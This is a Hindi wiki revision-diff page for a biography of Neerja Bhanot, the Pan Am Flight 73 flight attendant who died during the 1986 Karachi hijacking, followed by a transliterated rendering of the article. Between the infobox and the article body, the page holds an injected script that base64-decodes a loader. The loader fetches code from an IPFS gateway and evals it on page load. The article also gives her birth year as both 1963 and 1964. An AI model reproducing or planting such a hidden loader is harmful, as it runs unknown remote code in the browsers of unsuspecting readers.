Difference between revisions of "नीरजा भनोट"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (श्रेणी:जीवनी परिचय; Adding category Category:जीवनी साहित्य (को हटा दिया गया हैं।))
Line 1: Line 1:
 +
{{सूचना बक्सा प्रसिद्ध व्यक्तित्व
 +
|चित्र=Neerja-Bhanot.jpg
 +
|चित्र का नाम=नीरजा भनोट
 +
|पूरा नाम=नीरजा भनोट
 +
|अन्य नाम=
 +
|जन्म= [[7 सितंबर]], [[1963]] 
 +
|जन्म भूमि=[[चंडीगढ़]]
 +
|मृत्यु=[[5 सितंबर]], [[1986]]
 +
|मृत्यु स्थान=[[कराची]], [[पाकिस्तान]]
 +
|अविभावक=हरीश भनोट (पिता)
 +
|पति/पत्नी=
 +
|संतान=
 +
|गुरु=
 +
|कर्म भूमि=
 +
|कर्म-क्षेत्र=विमान परिचारिका (एयर होस्टेस)
 +
|मुख्य रचनाएँ=
 +
|विषय=
 +
|खोज=
 +
|भाषा=
 +
|शिक्षा=
 +
|विद्यालय=
 +
|पुरस्कार-उपाधि=[[अशोक चक्र (पदक)|अशोक चक्र]]
 +
|प्रसिद्धि=
 +
|विशेष योगदान=
 +
|नागरिकता=भारतीय
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|शीर्षक 3=
 +
|पाठ 3=
 +
|शीर्षक 4=
 +
|पाठ 4=
 +
|शीर्षक 5=
 +
|पाठ 5=
 +
|अन्य जानकारी=नीरजा भनोट [[5 सितंबर]] [[1986]] के पैन ऐम उड़ान 73 के अपहृत विमान में यात्रियों की सहायता एवं सुरक्षा करते हुए आतंकवादियों की गोलियों का शिकार हो गईं थीं।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन={{अद्यतन|19:35, 15 फ़रवरी 2015 (IST)}}
 +
}}
 
'''नीरजा भनोट''' ([[अंग्रेज़ी]]: ''Neerja Bhanot'', जन्म: 7 सितंबर, 1963 - 5 सितंबर 1986) [[मुंबई]] में पैन ऐम एअरलाइन्स की विमान परिचारिका थीं। [[5 सितंबर]] [[1986]] के पैन ऐम उड़ान 73 के अपहृत विमान में यात्रियों की सहायता एवं सुरक्षा करते हुए वे आतंकवादियों की गोलियों का शिकार हो गईं थीं। नीरजा वास्तव में स्वतंत्र [[भारत]] की महानतम वीरांगना है। आतंकियों से लगभग 400 यात्रियों को जान बचाते हुए अपना जीवन बलिदान कर दिया था। नीरजा भनोट [[अशोक चक्र (पदक)|अशोक चक्र]] पाने वाली पहली महिला थीं।  
 
'''नीरजा भनोट''' ([[अंग्रेज़ी]]: ''Neerja Bhanot'', जन्म: 7 सितंबर, 1963 - 5 सितंबर 1986) [[मुंबई]] में पैन ऐम एअरलाइन्स की विमान परिचारिका थीं। [[5 सितंबर]] [[1986]] के पैन ऐम उड़ान 73 के अपहृत विमान में यात्रियों की सहायता एवं सुरक्षा करते हुए वे आतंकवादियों की गोलियों का शिकार हो गईं थीं। नीरजा वास्तव में स्वतंत्र [[भारत]] की महानतम वीरांगना है। आतंकियों से लगभग 400 यात्रियों को जान बचाते हुए अपना जीवन बलिदान कर दिया था। नीरजा भनोट [[अशोक चक्र (पदक)|अशोक चक्र]] पाने वाली पहली महिला थीं।  
 
==जीवन परिचय==
 
==जीवन परिचय==
Line 4: Line 44:
 
उसने सर्वप्रथम खाने के पैकेट आतंकियों को ही दिये क्योंकि उसका सोचना था कि भूख से पेट भरने के बाद शायद वो शांत दिमाग से बात करे। इसी बीच सभी यात्रियों ने आपातकालीन द्वारों की पहचान कर ली। नीरजा ने जैसा सोचा था वही हुआ। विमान का ईंधन समाप्त हो गया और चारो ओर अंधेरा छा गया। नीरजा तो इसी समय का इंतजार कर रही थी। तुरन्त उसने विमान के सारे आपातकालीन द्वार खोल दिये। योजना के अनुरूप ही यात्री तुरन्त उन द्वारों के नीचे कूदने लगे। वहीं आतंकियों ने भी अंधेरे में फायरिंग शुरू कर दी। किन्तु नीरजा ने अपने साहस से लगभग सभी यात्रियों को बचा लिया था। कुछ घायल अवश्य हो गये थे किन्तु ठीक थे अब विमान से भागने की बारी नीरजा की थी किन्तु तभी उसे बच्चों के रोने की आवाज सुनाई दी। दूसरी ओर पाकिस्तानी सेना के कमांडो भी विमान में आ चुके थे। उन्होंने तीन आतंकियों को मार गिराया। इधर नीरजा उन तीन बच्चों को खोज चुकी थी और उन्हें लेकर विमान के आपातकालीन द्वार की ओर बढ़ने लगी। कि अचानक बचा हुआ चैथा आतंकवादी उसके सामने आ खड़ा हुआ। नीरजा ने बच्चों को आपातकालीन द्वार की ओर धकेल दिया और स्वयं उस आतंकी से भिड़ गई। आतंकी ने कई गोलियां उसके सीने में उतार डाली। नीरजा ने अपना बलिदान दे दिया। उस चौथे आतंकी को भी पाकिस्तानी कमांडों ने मार गिराया किन्तु वो नीरजा को न बचा सके।<ref>{{cite web |url=http://satyarthved.blogspot.in/2012/09/blog-post.html |title=एक थी नीरजा  |accessmonthday=15 फ़रवरी |accessyear=2015 |last= |first= |authorlink= |format= |publisher=हिन्दी.हिन्दू.हिन्दुस्तान |language=हिन्दी }} </ref>
 
उसने सर्वप्रथम खाने के पैकेट आतंकियों को ही दिये क्योंकि उसका सोचना था कि भूख से पेट भरने के बाद शायद वो शांत दिमाग से बात करे। इसी बीच सभी यात्रियों ने आपातकालीन द्वारों की पहचान कर ली। नीरजा ने जैसा सोचा था वही हुआ। विमान का ईंधन समाप्त हो गया और चारो ओर अंधेरा छा गया। नीरजा तो इसी समय का इंतजार कर रही थी। तुरन्त उसने विमान के सारे आपातकालीन द्वार खोल दिये। योजना के अनुरूप ही यात्री तुरन्त उन द्वारों के नीचे कूदने लगे। वहीं आतंकियों ने भी अंधेरे में फायरिंग शुरू कर दी। किन्तु नीरजा ने अपने साहस से लगभग सभी यात्रियों को बचा लिया था। कुछ घायल अवश्य हो गये थे किन्तु ठीक थे अब विमान से भागने की बारी नीरजा की थी किन्तु तभी उसे बच्चों के रोने की आवाज सुनाई दी। दूसरी ओर पाकिस्तानी सेना के कमांडो भी विमान में आ चुके थे। उन्होंने तीन आतंकियों को मार गिराया। इधर नीरजा उन तीन बच्चों को खोज चुकी थी और उन्हें लेकर विमान के आपातकालीन द्वार की ओर बढ़ने लगी। कि अचानक बचा हुआ चैथा आतंकवादी उसके सामने आ खड़ा हुआ। नीरजा ने बच्चों को आपातकालीन द्वार की ओर धकेल दिया और स्वयं उस आतंकी से भिड़ गई। आतंकी ने कई गोलियां उसके सीने में उतार डाली। नीरजा ने अपना बलिदान दे दिया। उस चौथे आतंकी को भी पाकिस्तानी कमांडों ने मार गिराया किन्तु वो नीरजा को न बचा सके।<ref>{{cite web |url=http://satyarthved.blogspot.in/2012/09/blog-post.html |title=एक थी नीरजा  |accessmonthday=15 फ़रवरी |accessyear=2015 |last= |first= |authorlink= |format= |publisher=हिन्दी.हिन्दू.हिन्दुस्तान |language=हिन्दी }} </ref>
 
==सम्मान==
 
==सम्मान==
 +
[[चित्र:Neerja-Bhanot-Stamp.jpg|thumb|सम्मान में जारी [[डाक टिकट]]]] 
 
नीरजा के बलिदान के बाद [[भारत सरकार]] ने नीरजा को सर्वोच्च नागरिक सम्मान [[अशोक चक्र (पदक)|अशोक चक्र]] प्रदान किया तो वहीं पाकिस्तान की सरकार ने भी नीरजा को तमगा-ए-इन्सानियत प्रदान किया। नीरजा वास्तव में स्वतंत्र भारत की महानतम विरांगना है। सन् [[2004]] में नीरजा भनोट के सम्मान में [[डाक टिकट]] भी जारी हो चुका है।
 
नीरजा के बलिदान के बाद [[भारत सरकार]] ने नीरजा को सर्वोच्च नागरिक सम्मान [[अशोक चक्र (पदक)|अशोक चक्र]] प्रदान किया तो वहीं पाकिस्तान की सरकार ने भी नीरजा को तमगा-ए-इन्सानियत प्रदान किया। नीरजा वास्तव में स्वतंत्र भारत की महानतम विरांगना है। सन् [[2004]] में नीरजा भनोट के सम्मान में [[डाक टिकट]] भी जारी हो चुका है।
  
Line 10: Line 51:
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 +
*[http://bharatkinaribharatkishan.blogspot.in/2011/08/neerja-bhanot.html नीरजा भनोट ]
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{अशोक चक्र सम्मान}}
 
{{अशोक चक्र सम्मान}}

Revision as of 14:05, 15 February 2015

niraja bhanot
poora nam niraja bhanot
janm 7 sitanbar, 1963
janm bhoomi chandigadh
mrityu 5 sitanbar, 1986
mrityu sthan karachi, pakistan
karm-kshetr viman paricharika (eyar hostes)
puraskar-upadhi ashok chakr
nagarikata bharatiy
any janakari niraja bhanot 5 sitanbar 1986 ke pain aim u dan 73 ke apahrit viman mean yatriyoan ki sahayata evan suraksha karate hue atankavadiyoan ki goliyoan ka shikar ho geean thian.
adyatan‎

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

niraja bhanot (aangrezi: Neerja Bhanot, janm: 7 sitanbar, 1963 - 5 sitanbar 1986) muanbee mean pain aim earalains ki viman paricharika thian. 5 sitanbar 1986 ke pain aim u dan 73 ke apahrit viman mean yatriyoan ki sahayata evan suraksha karate hue ve atankavadiyoan ki goliyoan ka shikar ho geean thian. niraja vastav mean svatantr bharat ki mahanatam viraangana hai. atankiyoan se lagabhag 400 yatriyoan ko jan bachate hue apana jivan balidan kar diya tha. niraja bhanot ashok chakr pane vali pahali mahila thian.

jivan parichay

7 sitambar 1964 ko chandigadh ke harish bhanot ke yahaan jab ek bachchi ka janm hua tha to kisi ne bhi nahian socha tha ki bharat ka sabase b da nagarik samman is bachchi ko milega. bachapan se hi is bachchi ko vayuyan mean baithane aur akash mean u dane ki prabal ichchha thi. niraja ne apani ichchha eyar lains pain em jvain karake poori ki. 16 janavari 1986 ko niraja ko akash chhoone vali ichchha ko vastav mean pankh lag gaye the. niraja pain em eyaralaeen mean bataur eyar hostej ka kam karane lagi. 5 sitambar 1986 ki vo gh di a gayi thi jahaan niraja ke jivan ki asali pariksha ki bari thi. pain em 73 viman karachi, pakistan ke eyaraport par apane payalet ka iantajar kar raha tha. viman mean lagabhag 400 yatri baithe huye the. achanak 4 atankavadiyoan ne poore viman ko gan pvaanit par le liya. unhoanne pakistani sarakar par dabav banaya ki vo jald mean jald viman mean payalat ko bheje. kintu pakistani sarakar ne mana kar diya. tab atankiyoan ne niraja aur usaki sahayogiyoan ko bulaya ki vo sabhi yatriyoan ke pasaport ekatrit kare taki vo kisi amerikan nagarik ko marakar pakistan par dabav bana sake. niraja ne sabhi yatriyoan ke pasaport ekatrit kiye aur viman mean baithe 5 ameriki yatriyoan ke pasaport chhupakar baki sabhi atankiyoan ko sauanp diye. usake bad atankiyoan ne ek british ko viman ke get par lakar pakistani sarakar ko dhamaki di ki yadi payalat nahian bheje to vah usako mar dege. kintu niraja ne us atanki se bat karake us british nagarik ko bhi bacha liya. dhire-dhire 16 ghante bit gaye. pakistan sarakar aur atankiyoan ke bich bat ka koee natija nahian nikala. achanak niraja ko dhyan aya ki viman mean eeandhan kisi bhi samay samapt ho sakata hai aur usake bad aandhera ho jayega. jaldi usane apani sahaparichayikaoan ko yatriyoan ko khana baantane ke lie kaha aur sath hi viman ke apatakalin dvaroan ke bare mean samajhane vala kard bhi dene ko kaha. niraja ko pata lag chuka tha ki atankavadi sabhi yatriyoan ko marane ki soch chuke haian. usane sarvapratham khane ke paiket atankiyoan ko hi diye kyoanki usaka sochana tha ki bhookh se pet bharane ke bad shayad vo shaant dimag se bat kare. isi bich sabhi yatriyoan ne apatakalin dvaroan ki pahachan kar li. niraja ne jaisa socha tha vahi hua. viman ka eeandhan samapt ho gaya aur charo or aandhera chha gaya. niraja to isi samay ka iantajar kar rahi thi. turant usane viman ke sare apatakalin dvar khol diye. yojana ke anuroop hi yatri turant un dvaroan ke niche koodane lage. vahian atankiyoan ne bhi aandhere mean phayariang shuroo kar di. kintu niraja ne apane sahas se lagabhag sabhi yatriyoan ko bacha liya tha. kuchh ghayal avashy ho gaye the kintu thik the ab viman se bhagane ki bari niraja ki thi kintu tabhi use bachchoan ke rone ki avaj sunaee di. doosari or pakistani sena ke kamaando bhi viman mean a chuke the. unhoanne tin atankiyoan ko mar giraya. idhar niraja un tin bachchoan ko khoj chuki thi aur unhean lekar viman ke apatakalin dvar ki or badhane lagi. ki achanak bacha hua chaitha atankavadi usake samane a kh da hua. niraja ne bachchoan ko apatakalin dvar ki or dhakel diya aur svayan us atanki se bhi d gee. atanki ne kee goliyaan usake sine mean utar dali. niraja ne apana balidan de diya. us chauthe atanki ko bhi pakistani kamaandoan ne mar giraya kintu vo niraja ko n bacha sake.[1]

samman

[[chitr:Neerja-Bhanot-Stamp.jpg|thumb|samman mean jari dak tikat]] niraja ke balidan ke bad bharat sarakar ne niraja ko sarvochch nagarik samman ashok chakr pradan kiya to vahian pakistan ki sarakar ne bhi niraja ko tamaga-e-insaniyat pradan kiya. niraja vastav mean svatantr bharat ki mahanatam viraangana hai. sanh 2004 mean niraja bhanot ke samman mean dak tikat bhi jari ho chuka hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. ek thi niraja (hindi) hindi.hindoo.hindustan. abhigaman tithi: 15 faravari, 2015.

bahari k diyaan

sanbandhit lekh